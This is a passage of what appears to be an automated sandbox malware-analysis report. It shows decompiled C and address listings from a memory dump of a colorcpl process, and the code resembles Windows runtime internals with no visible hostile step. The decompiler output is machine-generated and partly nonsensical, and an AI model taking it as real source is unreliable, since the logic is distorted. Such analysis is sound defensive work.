																	}
																	goto L14;
																}
															}
															asm("lock cmpxchg [esi], ecx");
															if(_t411 != _t411) {
																continue;
															}
															_t360 =  *_t444;
															_t460 = 0;
															_v24 = _t360;
															do {
																_t228 = _t360 + ((( *(_t360 + 0x5e) & 0x0000ffff) + _t460 & 0x0000000f) + 2) * 4;
																_t412 =  *_t228;
																_v28 = _t228;
																if(_t412 != 0) {
																	if((_t412[7] & 0x00000001) != 0) {
																		goto L126;
																	}
																	asm("lock cmpxchg [ebx], ecx");
																	_t317 = _v8;
																	if(_t412 == _t412) {
																		L101:
																		_t449 = 0xfffffffd;
																		_t233 = _t412[7];
																		do {
																			asm("lock cmpxchg [esi], ecx");
																		} while ((_t233 & _t449) != 0);
																		goto L103;
																	}
																	L125:
																	_t360 = _v24;
																	goto L126;
																}
																asm("lock cmpxchg [edx], ecx");
																_t188 =  &(_t317[1]); // 0x4434804
																_t202 = _t188;
																if(0 == 0) {
																	while(1) {
																		L2:
																		_t404 =  *_t202;
																		_v12 = _t404;
																		if(_t404 == 0) {
																			goto L31;
																		} else {
																			_v24 = _v24 & 0x00000000;
																			_t283 = _t404 + 0x10;
																			_v20 = _t283;
																			_t336 =  *_t317;
																			_t454 =  *( *_t317 + 0xc);
																			_v32 = _t454;
																			if( *_t283 >> 0x10 < 0) {
																				_t11 =  &(_t317[0x17]); // 0x0
																				_t448 =  *_t11 & 0x0000ffff;
																				_t336 = 1;
																				_v24 = 1;
																				if((1 &  *(_t454 + 0x1bf + _t448 * 4)) == 0) {
																					_t336 = _t454;
																					if(E0433E202(_t454,  *(_t454 + 0x1be + _t448 * 4) & 0x000000ff) >= 0) {
																						_t336 = 1;
																						 *(_t454 + 0x1bf + _t448 * 4) =  *(_t454 + 0x1bf + _t448 * 4) | 1;
																						if(E04353C40() == 0) {
																							_t312 = 0x7ffe0380;
																						} else {
																							_t312 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
																						}
																						if( *_t312 != 0) {
																							_t336 = 1;
																							if(( *( *[fs:0x30] + 0x240) & 1) != 0) {
																								_t336 =  *(_t454 + 0xc);
																								E043FEE78( *(_t454 + 0xc),  *(_t454 + 0x1be + _t448 * 4) & 0x000000ff);
																							}
																						}
																					}
																					_t404 = _v12;
																				}
																			}
																			asm("sbb eax, eax");
																			_t445 = 0;
																			_v28 = 0;
																		}
																		goto L14;
																	}
																}
																goto L125;
																L126:
																_t460 = _t460 + 1;
															} while (_t460 < 0x10);
															L127:
															_t356 =  *((intOrPtr*)( *((intOrPtr*)( *( *_t444) + 0xc)) + 0x3c0 + ( *( *_t444 + 0x5c) & 0x0000ffff) * 4)) + 0x48;
															goto L128;
														}
														while(1) {
															L2:
															_t404 =  *_t202;
															_v12 = _t404;
															if(_t404 == 0) {
																goto L31;
															} else {
																_v24 = _v24 & 0x00000000;
																_t283 = _t404 + 0x10;
																_v20 = _t283;
																_t336 =  *_t317;
																_t454 =  *( *_t317 + 0xc);
																_v32 = _t454;
																if( *_t283 >> 0x10 < 0) {
																	_t11 =  &(_t317[0x17]); // 0x0
																	_t448 =  *_t11 & 0x0000ffff;
																	_t336 = 1;
																	_v24 = 1;
																	if((1 &  *(_t454 + 0x1bf + _t448 * 4)) == 0) {
																		_t336 = _t454;
																		if(E0433E202(_t454,  *(_t454 + 0x1be + _t448 * 4) & 0x000000ff) >= 0) {
																			_t336 = 1;
																			 *(_t454 + 0x1bf + _t448 * 4) =  *(_t454 + 0x1bf + _t448 * 4) | 1;
																			if(E04353C40() == 0) {
																				_t312 = 0x7ffe0380;
																			} else {
																				_t312 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
																			}
																			if( *_t312 != 0) {
																				_t336 = 1;
																				if(( *( *[fs:0x30] + 0x240) & 1) != 0) {
																					_t336 =  *(_t454 + 0xc);
																					E043FEE78( *(_t454 + 0xc),  *(_t454 + 0x1be + _t448 * 4) & 0x000000ff);
																				}
																			}
																		}
																		_t404 = _v12;
																	}
																}
																asm("sbb eax, eax");
																_t445 = 0;
																_v28 = 0;
															}
															goto L14;
														}
													}
												}
												_t416 = 0xfffffff9;
												_t241 =  *_t453;
												do {
													asm("lock cmpxchg [esi], ecx");
												} while ((_t241 & _t416) != 0);
												if(_t241 != 6) {
													goto L88;
												}
												goto L79;
											}
											L2:
											_t404 =  *_t202;
											_v12 = _t404;
											if(_t404 == 0) {
												goto L31;
											} else {
												_v24 = _v24 & 0x00000000;
												_t283 = _t404 + 0x10;
												_v20 = _t283;
												_t336 =  *_t317;
												_t454 =  *( *_t317 + 0xc);
												_v32 = _t454;
												if( *_t283 >> 0x10 < 0) {
													_t11 =  &(_t317[0x17]); // 0x0
													_t448 =  *_t11 & 0x0000ffff;
													_t336 = 1;
													_v24 = 1;
													if((1 &  *(_t454 + 0x1bf + _t448 * 4)) == 0) {
														_t336 = _t454;
														if(E0433E202(_t454,  *(_t454 + 0x1be + _t448 * 4) & 0x000000ff) >= 0) {
															_t336 = 1;
															 *(_t454 + 0x1bf + _t448 * 4) =  *(_t454 + 0x1bf + _t448 * 4) | 1;
															if(E04353C40() == 0) {
																_t312 = 0x7ffe0380;
															} else {
																_t312 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
															}
															if( *_t312 != 0) {
																_t336 = 1;
																if(( *( *[fs:0x30] + 0x240) & 1) != 0) {
																	_t336 =  *(_t454 + 0xc);
																	E043FEE78( *(_t454 + 0xc),  *(_t454 + 0x1be + _t448 * 4) & 0x000000ff);
																}
															}
														}
														_t404 = _v12;
													}
												}
												asm("sbb eax, eax");
												_t445 = 0;
												_v28 = 0;
											}
										}
										_t107 = _t444 + 0x1c; // 0x1c
										_t326 = 0xfffffffd;
										_t263 =  *_t107;
										do {
											asm("lock cmpxchg [edx], ecx");
										} while ((_t263 & _t326) != 0);
										if(_t263 != 2) {
											goto L70;
										}
										_t108 = _t444 + 0x20; // 0x20
										 *_t444 =  *_t444 & 0x00000000;
										E043520E0( *( *_t444), _t108);
										_t204 = _v16;
										_t444 = 0;
										L33:
										_t318 = 0;
										_v20 = 0x10;
										_v24 = _v24 & 0;
										_t331 = _t204;
										_v12 = _t331;
										goto L34;
									}
									_t85 = _t451 + 0x5c; // 0x0
									_t269 =  *((intOrPtr*)( *((intOrPtr*)(_v28 + 0xc)) + 0x3c0 + ( *_t85 & 0x0000ffff) * 4)) + 0x48;
									_v12 =  *((intOrPtr*)( *((intOrPtr*)(_v28 + 0xc)) + 0x3c0 + ( *_t85 & 0x0000ffff) * 4)) + 0x48;
									while(1) {
										_t463 = E0436FE50(_t269);
										_v20 = _t463;
										if(_t463 == 0) {
											break;
										}
										_t463 = _t463 - 0x20;
										_t91 =  &(_t463[7]); // -4
										_t430 = _t91;
										if((1 &  *_t430) != 0) {
											if(E04382670(_t463, _v8) == 0) {
												E043520E0(_v12, _v20);
												_t463 = 0;
											}
											break;
										}
										_t450 = 0xfffffffd;
										_t278 =  *_t430;
										do {
											asm("lock cmpxchg [edx], ecx");
										} while ((_t278 & _t450) != 0);
										_t444 = _v24;
										_t269 = _v12;
										if(_t278 == 2) {
											 *_t463 =  *_t463 & 0x00000000;
											E043520E0( *( *_t463), _v20);
											_t269 = _v12;
										}
									}
									asm("lock cmpxchg [ebx], edx");
									if(_t444 == _t444) {
										if(_t463 == 0) {
											_v8[0x17] = _t318 - _v8 - 0x00000008 >> 0x00000002 & 0x000000ff;
										}
										goto L55;
									}
									_t204 = _v16;
									if(_t463 != 0) {
										_t103 =  &(_t463[8]); // 0x20
										E043520E0(_v12, _t103);
										_t204 = _v16;
									}
								}
							}
						}
						L103:
						_t166 =  &(_t317[1]); // 0x4434804
						_t202 = _t166;
					} while (_t233 != 2);
					_t356 =  *( *_t412);
					 *_t412 =  *_t412 & 0x00000000;
					_t409 =  &(_t412[8]);
					goto L129;
				}
			}

0x04401256
0x04401258
0x0440125c
0x0440125f
0x0440125f
0x0440125f
0x0440125f
0x0440125f
0x04401262
0x04401262
0x04401262
0x04401262
0x04401264
0x04401269
0x00000000
0x0440126f
0x0440126f
0x04401273
0x04401276
0x0440127b
0x04401280
0x04401283
0x04401289
0x0440128f
0x0440128f
0x04401295
0x04401296
0x044012a2
0x044012ac
0x044012b5
0x044012c0
0x044012c3
0x044012d1
0x044012e3
0x044012d3
0x044012dc
0x044012dc
0x044012eb
0x044012f5
0x044012fc
0x04401306
0x04401309
0x04401309
0x044012fc
0x044012eb
0x0440130e
0x0440130e
0x044012a2
0x0440131b
0x04401320
0x04401322
0x04401322
0x04401325
0x04401325
0x04401325
0x04401332
0x00000000
0x00000000
0x04401337
0x04401405
0x04401405
0x04401407
0x0440140b
0x0440140d
0x04401412
0x04401415
0x0440141b
0x04401429
0x04401429
0x0440141b
0x0440142f
0x044018d5
0x044018d9
0x00000000
0x00000000
0x00000000
0x0440142f
0x04401342
0x0440134a
0x0440134e
0x04401353
0x0440135e
0x04401361
0x00000000
0x00000000
0x04401367
0x0440136a
0x0440136f
0x04401403
0x00000000
0x04401382
0x04401382
0x04401386
0x044013ae
0x044013b7
0x044013c1
0x044013de
0x044013e4
0x044013ea
0x044013eb
0x044013ec
0x044013ed
0x044013f3
0x044013f7
0x044013fc
0x044013fc
0x00000000
0x044013e4
0x0440136f
0x04401355
0x04401355
0x04401356
0x0440135b
0x00000000
0x04401435
0x04401437
0x0440143a
0x0440143a
0x0440143d
0x04401440
0x04401440
0x04401442
0x04401442
0x04401442
0x04401444
0x0440144b
0x0440144e
0x04401450
0x04401453
0x04401453
0x04401453
0x04401455
0x04401458
0x0440145d
0x04401463
0x04401466
0x0440146c
0x04401470
0x04401475
0x0440147a
0x0440147f
0x04401481
0x04401484
0x04401484
0x0440147a
0x0440146c
0x04401487
0x0440148a
0x0440148a
0x0440148e
0x0440148e
0x04401493
0x04401498
0x0440155f
0x04401561
0x04401563
0x04401597
0x0440159a
0x0440159c
0x044015af
0x044015b2
0x044015b5
0x044015b8
0x044015bb
0x044015c2
0x044015c4
0x044015c9
0x00000000
0x00000000
0x044015cb
0x044015cb
0x044015d0
0x044015d0
0x044015d8
0x044016b5
0x044016b6
0x044016b8
0x044016bc
0x044016bc
0x044016c2
0x044016c8
0x044016d8
0x044016d8
0x044016db
0x00000000
0x044016db
0x044016ca
0x044016d0
0x044016d3
0x00000000
0x044016d3
0x044015ea
0x0440169f
0x044016a4
0x044016a6
0x044016a6
0x044016aa
0x044016ac
0x044016ae
0x00000000
0x044016ae
0x044015f2
0x044015f5
0x044015f6
0x044015f8
0x044015fc
0x044015fc
0x04401602
0x04401608
0x00000000
0x00000000
0x0440161a
0x00000000
0x00000000
0x00000000
0x0440161a
0x04401620
0x04401625
0x04401631
0x04401631
0x04401636
0x04401638
0x044018d1
0x00000000
0x044018d1
0x04401641
0x04401641
0x04401644
0x04401647
0x04401647
0x0440164a
0x0440164c
0x0440164c
0x04401651
0x00000000
0x00000000
0x04401657
0x04401657
0x0440165d
0x04401262
0x04401262
0x04401262
0x04401264
0x04401269
0x00000000
0x0440126f
0x0440126f
0x04401273
0x04401276
0x0440127b
0x04401280
0x04401283
0x04401289
0x0440128f
0x0440128f
0x04401295
0x04401296
0x044012a2
0x044012ac
0x044012b5
0x044012c0
0x044012c3
0x044012d1
0x044012e3
0x044012d3
0x044012dc
0x044012dc
0x044012eb
0x044012f5
0x044012fc
0x04401306
0x04401309
0x04401309
0x044012fc
0x044012eb
0x0440130e
0x0440130e
0x044012a2
0x0440131b
0x04401320
0x04401322
0x04401322
0x00000000
0x04401269
0x04401262
0x0440166a
0x04401670
0x00000000
0x00000000
0x04401672
0x04401674
0x04401679
0x044017aa
0x044017b1
0x044017c3
0x044017b3
0x044017bc
0x044017bc
0x044017cb
0x044017e9
0x044017e9
0x044017ee
0x044017ee
0x044017f1
0x044017f1
0x044017f1
0x044017f5
0x00000000
0x04401262
0x04401262
0x04401262
0x04401262
0x04401262
0x04401262
0x04401264
0x04401269
0x00000000
0x0440126f
0x0440126f
0x04401273
0x04401276
0x0440127b
0x04401280
0x04401283
0x04401289
0x0440128f
0x0440128f
0x04401295
0x04401296
0x044012a2
0x044012ac
0x044012b5
0x044012c0
0x044012c3
0x044012d1
0x044012e3
0x044012d3
0x044012dc
0x044012dc
0x044012eb
0x044012f5
0x044012fc
0x04401306
0x04401309
0x04401309
0x044012fc
0x044012eb
0x0440130e
0x0440130e
0x044012a2
0x0440131b
0x04401320
0x04401322
0x04401322
0x00000000
0x04401269
0x00000000
0x04401262
0x00000000
0x044016e2
0x044016e7
0x044016ee
0x044016ee
0x044016ee
0x044016f7
0x044016f7
0x044016f9
0x044016f9
0x044016fe
0x00000000
0x00000000
0x04401704
0x04401704
0x0440170a
0x04401262
0x04401262
0x04401262
0x04401264
0x04401269
0x00000000
0x0440126f
0x0440126f
0x04401273
0x04401276
0x0440127b
0x04401280
0x04401283
0x04401289
0x0440128f
0x0440128f
0x04401295
0x04401296
0x044012a2
0x044012ac
0x044012b5
0x044012c0
0x044012c3
0x044012d1
0x044012e3
0x044012d3
0x044012dc
0x044012dc
0x044012eb
0x044012f5
0x044012fc
0x04401306
0x04401309
0x04401309
0x044012fc
0x044012eb
0x0440130e
0x0440130e
0x044012a2
0x0440131b
0x04401320
0x04401322
0x04401322
0x00000000
0x04401269
0x04401262
0x04401717
0x0440171d
0x00000000
0x00000000
0x0440171f
0x04401721
0x04401723
0x04401726
0x04401732
0x04401735
0x04401737
0x0440173c
0x0440175b
0x00000000
0x00000000
0x04401764
0x04401768
0x0440176d
0x00000000
0x00000000
0x0440176f
0x0440176f
0x00000000
0x0440176f
0x04401745
0x0440174b
0x0440174b
0x0440174e
0x00000000
0x00000000
0x00000000
0x04401772
0x04401772
0x04401773
0x00000000
0x04401778
0x00000000
0x044016f7
0x00000000
0x044017fb
0x044017fb
0x044017fd
0x044017fd
0x04401800
0x04401801
0x04401803
0x04401807
0x04401807
0x04401810
0x04401693
0x04401695
0x04401697
0x044018c4
0x044018c4
0x044018c4
0x044018c7
0x044018c7
0x00000000
0x044018c7
0x04401816
0x0440181a
0x04401821
0x04401821
0x04401824
0x04401262
0x04401262
0x04401262
0x04401264
0x04401269
0x00000000
0x0440126f
0x0440126f
0x04401273
0x04401276
0x0440127b
0x04401280
0x04401283
0x04401289
0x0440128f
0x0440128f
0x04401295
0x04401296
0x044012a2
0x044012ac
0x044012b5
0x044012c0
0x044012c3
0x044012d1
0x044012e3
0x044012d3
0x044012dc
0x044012dc
0x044012eb
0x044012f5
0x044012fc
0x04401306
0x04401309
0x04401309
0x044012fc
0x044012eb
0x0440130e
0x0440130e
0x044012a2
0x0440131b
0x04401320
0x04401322
0x04401322
0x00000000
0x04401269
0x00000000
0x00000000
0x00000000
0x0440182a
0x0440182a
0x0440182a
0x0440182c
0x0440182c
0x04401831
0x00000000
0x00000000
0x04401837
0x04401837
0x0440183d
0x04401262
0x04401262
0x04401262
0x04401264
0x04401269
0x00000000
0x0440126f
0x0440126f
0x04401273
0x04401276
0x0440127b
0x04401280
0x04401283
0x04401289
0x0440128f
0x0440128f
0x04401295
0x04401296
0x044012a2
0x044012ac
0x044012b5
0x044012c0
0x044012c3
0x044012d1
0x044012e3
0x044012d3
0x044012dc
0x044012dc
0x044012eb
0x044012f5
0x044012fc
0x04401306
0x04401309
0x04401309
0x044012fc
0x044012eb
0x0440130e
0x0440130e
0x044012a2
0x0440131b
0x04401320
0x04401322
0x04401322
0x00000000
0x04401269
0x04401262
0x0440184a
0x04401850
0x00000000
0x00000000
0x04401852
0x04401854
0x04401856
0x04401859
0x04401865
0x04401868
0x0440186a
0x0440186f
0x0440188e
0x00000000
0x00000000
0x04401897
0x0440189b
0x044018a0
0x0440177d
0x04401782
0x04401783
0x04401785
0x04401789
0x04401789
0x00000000
0x04401785
0x044018a6
0x044018a6
0x00000000
0x044018a6
0x04401878
0x0440187e
0x0440187e
0x04401881
0x04401262
0x04401262
0x04401262
0x04401264
0x04401269
0x00000000
0x0440126f
0x0440126f
0x04401273
0x04401276
0x0440127b
0x04401280
0x04401283
0x04401289
0x0440128f
0x0440128f
0x04401295
0x04401296
0x044012a2
0x044012ac
0x044012b5
0x044012c0
0x044012c3
0x044012d1
0x044012e3
0x044012d3
0x044012dc
0x044012dc
0x044012eb
0x044012f5
0x044012fc
0x04401306
0x04401309
0x04401309
0x044012fc
0x044012eb
0x0440130e
0x0440130e
0x044012a2
0x0440131b
0x04401320
0x04401322
0x04401322
0x00000000
0x04401269
0x04401262
0x00000000
0x044018a9
0x044018a9
0x044018aa
0x044018af
0x044018c1
0x00000000
0x044018c1
0x04401262
0x04401262
0x04401262
0x04401264
0x04401269
0x00000000
0x0440126f
0x0440126f
0x04401273
0x04401276
0x0440127b
0x04401280
0x04401283
0x04401289
0x0440128f
0x0440128f
0x04401295
0x04401296
0x044012a2
0x044012ac
0x044012b5
0x044012c0
0x044012c3
0x044012d1
0x044012e3
0x044012d3
0x044012dc
0x044012dc
0x044012eb
0x044012f5
0x044012fc
0x04401306
0x04401309
0x04401309
0x044012fc
0x044012eb
0x0440130e
0x0440130e
0x044012a2
0x0440131b
0x04401320
0x04401322
0x04401322
0x00000000
0x04401269
0x04401262
0x044017f5
0x04401681
0x04401682
0x04401684
0x04401688
0x04401688
0x04401691
0x00000000
0x00000000
0x00000000
0x04401691
0x04401262
0x04401262
0x04401264
0x04401269
0x00000000
0x0440126f
0x0440126f
0x04401273
0x04401276
0x0440127b
0x04401280
0x04401283
0x04401289
0x0440128f
0x0440128f
0x04401295
0x04401296
0x044012a2
0x044012ac
0x044012b5
0x044012c0
0x044012c3
0x044012d1
0x044012e3
0x044012d3
0x044012dc
0x044012dc
0x044012eb
0x044012f5
0x044012fc
0x04401306
0x04401309
0x04401309
0x044012fc
0x044012eb
0x0440130e
0x0440130e
0x044012a2
0x0440131b
0x04401320
0x04401322
0x04401322
0x04401269
0x04401567
0x0440156a
0x0440156b
0x0440156d
0x04401571
0x04401571
0x0440157a
0x00000000
0x00000000
0x04401582
0x04401587
0x0440158a
0x0440158f
0x04401440
0x04401442
0x04401442
0x04401444
0x0440144b
0x0440144e
0x04401450
0x00000000
0x04401450
0x044014a4
0x044014af
0x044014b2
0x044014b5
0x044014bc
0x044014be
0x044014c3
0x00000000
0x00000000
0x044014c5
0x044014cb
0x044014cb
0x044014d2
0x0440150e
0x04401516
0x0440151b
0x0440151b
0x00000000
0x0440150e
0x044014d6
0x044014d7
0x044014d9
0x044014dd
0x044014dd
0x044014e3
0x044014e9
0x044014ec
0x044014f5
0x044014f8
0x044014fd
0x044014fd
0x044014ec
0x04401521
0x04401527
0x04401549
0x04401559
0x04401559
0x00000000
0x04401549
0x04401529
0x0440152e
0x04401537
0x0440153a
0x0440153f
0x0440153f
0x0440152e
0x04401442
0x04401440
0x0440178f
0x04401792
0x04401792
0x04401792
0x0440179d
0x0440179f
0x044017a2
0x00000000
0x044017a2

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dc952b9dc478cf5be92f90f7dbacfb4c2d2ffb8f1243f8d86e894ab9ac5fc8c
Instruction ID: 1b8f2084e1e5f206f026b74e03bce3994f65bc2cf0587cdc128301e579e68504
Opcode Fuzzy Hash: 5dc952b9dc478cf5be92f90f7dbacfb4c2d2ffb8f1243f8d86e894ab9ac5fc8c
Instruction Fuzzy Hash: DB228035A002168FDF29CF58C490AAAB7B1BF88304B14857ED856EB395DB35F952CB90

Uniqueness

Uniqueness Score: -1.00%

Function 043D84BB Relevance: .4, Instructions: 386
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E043D84BB(void* __ebx, signed int __ecx, void* __edx, void* __eflags, signed int* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v5;
				char _v6;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed char _v40;
				signed int _v44;
				signed int _v48;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t152;
				signed int _t157;
				signed int _t158;
				intOrPtr _t167;
				signed char _t186;
				signed char _t196;
				signed int _t198;
				signed int _t199;
				signed char _t203;
				signed int _t218;
				signed int _t219;
				signed int _t221;
				signed int _t222;
				intOrPtr _t223;
				signed int _t226;
				signed int _t230;
				signed int _t233;
				signed int _t236;
				signed int _t237;
				intOrPtr _t238;
				signed int _t240;
				signed int _t242;
				signed char _t244;
				signed int _t245;
				signed int _t248;
				signed int _t255;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t264;
				signed int _t265;
				signed int _t268;
				signed char _t270;
				void* _t275;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				signed int _t282;
				signed int _t286;
				signed int _t287;
				void* _t295;
				signed int _t296;
				void* _t297;
				void* _t298;
				signed int _t299;
				signed int _t301;
				void* _t302;

				_v12 = __ecx;
				_v24 = 0;
				_v6 = 0;
				_v16 = 0;
				_v5 = 0;
				_v28 = 0;
				_t295 = __edx;
				_push(__edx);
				_v36 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				if(E043781A0(__ebx, _t275, __edx, __eflags) != 0) {
					_t233 =  *(__edx + 4);
					_t258 = _t233;
					_push(__ebx);
					_t218 =  *(__edx + 2) & 0x0000ffff;
					_t276 = _t218;
					_v32 = _t276;
					__eflags = _t276;
					if(_t276 >= 0) {
						_v48 = _t233;
					} else {
						asm("sbb edx, edx");
						_t258 =  ~_t258 & _t233 + __edx;
						_v48 = _t258;
					}
					__eflags = _t258;
					if(_t258 != 0) {
						_t259 =  *(_t295 + 8);
						__eflags = _t276;
						if(_t276 >= 0) {
							_v20 = _t259;
						} else {
							asm("sbb edi, edi");
							_v20 =  ~_t259 & _t259 + _t295;
							_t276 = _v32;
						}
						__eflags = _t218 & 0x00000010;
						if((_t218 & 0x00000010) == 0) {
							L30:
							_t277 = _v12;
							_t236 = _t218 & 0x00002010 | 0x00000800;
							_v32 = _t236;
							__eflags = _t277;
							if(_t277 == 0) {
								_t260 = 0;
								__eflags = 0;
								L35:
								__eflags = _t260;
								if(_t260 != 0) {
									_t248 = _t236 | 0x00002000;
									__eflags = _t248;
									_v32 = _t248;
								}
								L37:
								_t219 = _t218 & 0x0000ffff;
								goto L38;
							}
							_t196 =  *(_t277 + 2) & 0x0000ffff;
							_t270 = _t196;
							__eflags = _t196 & 0x00000010;
							if((_t196 & 0x00000010) == 0) {
								goto L37;
							}
							__eflags = _t270;
							_t260 =  *(_t277 + 0xc);
							if(_t270 < 0) {
								asm("sbb edx, edx");
								_t260 =  ~_t260 & _t260 + _t277;
							}
							goto L35;
						} else {
							_t230 =  *(_t295 + 0xc);
							__eflags = _t276;
							if(_t276 >= 0) {
								_t198 = _t230;
								_v40 = _t198;
							} else {
								asm("sbb edi, edi");
								_v40 =  ~_t230 & _t230 + _t295;
								_t276 = _v32;
								_t198 = _v40;
							}
							__eflags = _t198;
							if(_t198 == 0) {
								_t218 =  *(_t295 + 2) & 0x0000ffff;
								goto L30;
							} else {
								_t199 =  *(_t295 + 2) & 0x0000ffff;
								__eflags = _t199 & 0x00002800;
								if((_t199 & 0x00002800) != 0) {
									L28:
									_v32 = _t199 & 0x00002010 | 0x00000800;
									_v24 = _v40;
									L27:
									_t219 =  *(_t295 + 2) & 0x0000ffff;
									_t277 = _v12;
									L38:
									_t152 = _t219 & 0x0000ffff;
									_v40 = _t152;
									__eflags = _t219 & 0x00000004;
									if((_t219 & 0x00000004) == 0) {
										L56:
										_t221 = _t219 & 0x00000004 | 0x00001400;
										__eflags = _t221;
										L57:
										_t237 = _v16;
										L58:
										_v12 = 0x0000000b + ( *(_v48 + 1) & 0x000000ff) * 0x00000004 & 0xfffffffc;
										_t157 = _v20;
										__eflags = _t157;
										if(_t157 == 0) {
											_t296 = 0;
											__eflags = 0;
										} else {
											_t296 = 0x0000000b + ( *(_t157 + 1) & 0x000000ff) * 0x00000004 & 0xfffffffc;
										}
										_t158 = _v24;
										__eflags = _t158;
										if(_t158 == 0) {
											_t261 = 0;
											__eflags = 0;
										} else {
											_t261 = ( *(_t158 + 2) & 0x0000ffff) + 0x00000003 & 0xfffffffc;
										}
										_v40 = _t261;
										__eflags = _t237;
										if(_t237 == 0) {
											_t278 = 0;
											__eflags = 0;
										} else {
											_t278 = ( *(_t237 + 2) & 0x0000ffff) + 0x00000003 & 0xfffffffc;
										}
										_t238 =  *0x4435d78; // 0x0
										_t240 = E04355D90(_t238 + 0x140000, _v36, _t238 + 0x140000, _t278 + _t261 + _t296 + _v12 + 0x14);
										_v28 = _t240;
										__eflags = _t240;
										if(_t240 != 0) {
											E043692F5(_t162, _t240);
											_t297 = _t240 + 0x14;
											 *(_t240 + 2) =  *(_t240 + 2) | _v32 | 0x00008000;
											_t264 = _v24;
											__eflags = _t264;
											if(_t264 == 0) {
												__eflags = 0;
											} else {
												E043888C0(_t297, _t264,  *(_t264 + 2) & 0x0000ffff);
												_t240 = _v28;
												_t302 = _t302 + 0xc;
												_t297 = _t297 + _v40;
												_push(0x14);
												_pop(0);
											}
											 *((intOrPtr*)(_t240 + 0xc)) = 0;
											 *(_t240 + 2) =  *(_t240 + 2) | _t221;
											_t265 = _v16;
											__eflags = _t265;
											if(_t265 == 0) {
												_t167 = 0;
												__eflags = 0;
											} else {
												E043888C0(_t297, _t265,  *(_t265 + 2) & 0x0000ffff);
												_t240 = _v28;
												_t302 = _t302 + 0xc;
												_t167 = _t297 - _t240;
												_t297 = _t297 + _t278;
											}
											 *((intOrPtr*)(_t240 + 0x10)) = _t167;
											E043888C0(_t297, _v48, 8 + ( *(_v48 + 1) & 0x000000ff) * 4);
											_t222 = _v28;
											_t298 = _t297 + _v12;
											_t242 = _v20;
											 *((intOrPtr*)(_t222 + 4)) = _t297 - _t222;
											__eflags = _t242;
											if(_t242 != 0) {
												E043888C0(_t298, _t242, 8 + ( *(_t242 + 1) & 0x000000ff) * 4);
												_t299 = _t298 - _t222;
												__eflags = _t299;
												 *(_t222 + 8) = _t299;
											}
											_t279 = 0;
											__eflags = 0;
										} else {
											_t279 = 0xc0000017;
										}
										__eflags = _v5;
										_t223 = _v36;
										if(_v5 != 0) {
											E04353BC0(_t223, 0, _v16);
										}
										L81:
										__eflags = _v6;
										if(_v6 != 0) {
											E04353BC0(_t223, 0, _v24);
										}
										goto L83;
									}
									_t268 =  *(_t295 + 0x10);
									_t237 = _t268;
									__eflags = _t152;
									if(_t152 < 0) {
										asm("sbb ecx, ecx");
										_t237 =  ~_t237 & _t268 + _t295;
										__eflags = _t237;
										_t152 = _v40;
									}
									__eflags = _t237;
									if(_t237 == 0) {
										goto L56;
									} else {
										__eflags = _t219 & 0x00001400;
										if((_t219 & 0x00001400) != 0) {
											L55:
											_v16 = _t237;
											_t221 = _t219 & 0x00001004 | 0x00000400;
											goto L58;
										}
										__eflags = _t277;
										if(_t277 == 0) {
											goto L55;
										}
										_t226 =  *(_t295 + 8);
										__eflags = _t152;
										if(_t152 < 0) {
											asm("sbb ebx, ebx");
											__eflags = _t226;
											_t152 = _v40;
										}
										_t282 =  *(_t295 + 4);
										__eflags = _t152;
										if(_t152 < 0) {
											asm("sbb edi, edi");
											_t282 =  ~_t282 & _t282 + _t295;
											__eflags = _v40;
											if(_v40 < 0) {
												asm("sbb edx, edx");
												__eflags = _t268;
											}
										}
										_t301 = _v12;
										_t186 =  *(_t301 + 2) & 0x0000ffff;
										_t244 = _t186;
										__eflags = _t186 & 0x00000004;
										if((_t186 & 0x00000004) != 0) {
											__eflags = _t244;
											_t245 =  *(_t301 + 0x10);
											if(_t244 < 0) {
												asm("sbb ecx, ecx");
												__eflags = _t245;
											}
										} else {
											_t245 = 0;
										}
										_t279 = E043D7CE8(_t245, _t268, _a8, _a12, _t282, _t226, _a16,  &_v16,  &_v44);
										__eflags = _t279;
										if(_t279 < 0) {
											_t223 = _v36;
											goto L81;
										} else {
											_v5 = 1;
											_t221 = _v44 & 0x00001408 | 0x00000004;
											goto L57;
										}
									}
								}
								__eflags = _v12;
								if(_v12 == 0) {
									goto L28;
								}
								__eflags = _t276;
								if(_t276 < 0) {
									asm("sbb edx, edx");
									_t259 =  ~_t259 & _t259 + _t295;
									__eflags = _t276;
									if(_t276 < 0) {
										asm("sbb ecx, ecx");
										_t233 =  ~_t233 & _t233 + _t295;
										__eflags = _t276;
										if(_t276 < 0) {
											asm("sbb ebx, ebx");
											__eflags = _t230;
										}
									}
								}
								_t203 =  *(_v12 + 2) & 0x0000ffff;
								_v40 = _t203;
								_t286 = _v12;
								__eflags = _t203 & 0x00000010;
								if((_t203 & 0x00000010) != 0) {
									__eflags = _v40;
									_t287 =  *(_t286 + 0xc);
									if(_v40 < 0) {
										asm("sbb edi, edi");
										__eflags = _t287;
									}
								} else {
									_t287 = 0;
								}
								_t279 = E043D7CE8(_t287, _t230, _a8, _a12, _t233, _t259, _a16,  &_v24,  &_v44);
								__eflags = _t279;
								if(_t279 < 0) {
									goto L83;
								} else {
									_t207 = _v44;
									_v6 = 1;
									_t255 = ((_v44 & 0x00000008 | 0x00000004) + (_v44 & 0x00000008 | 0x00000004) | _t207 & 0x00001400) + ((_v44 & 0x00000008 | 0x00000004) + (_v44 & 0x00000008 | 0x00000004) | _t207 & 0x00001400);
									__eflags = _t255;
									_v32 = _t255;
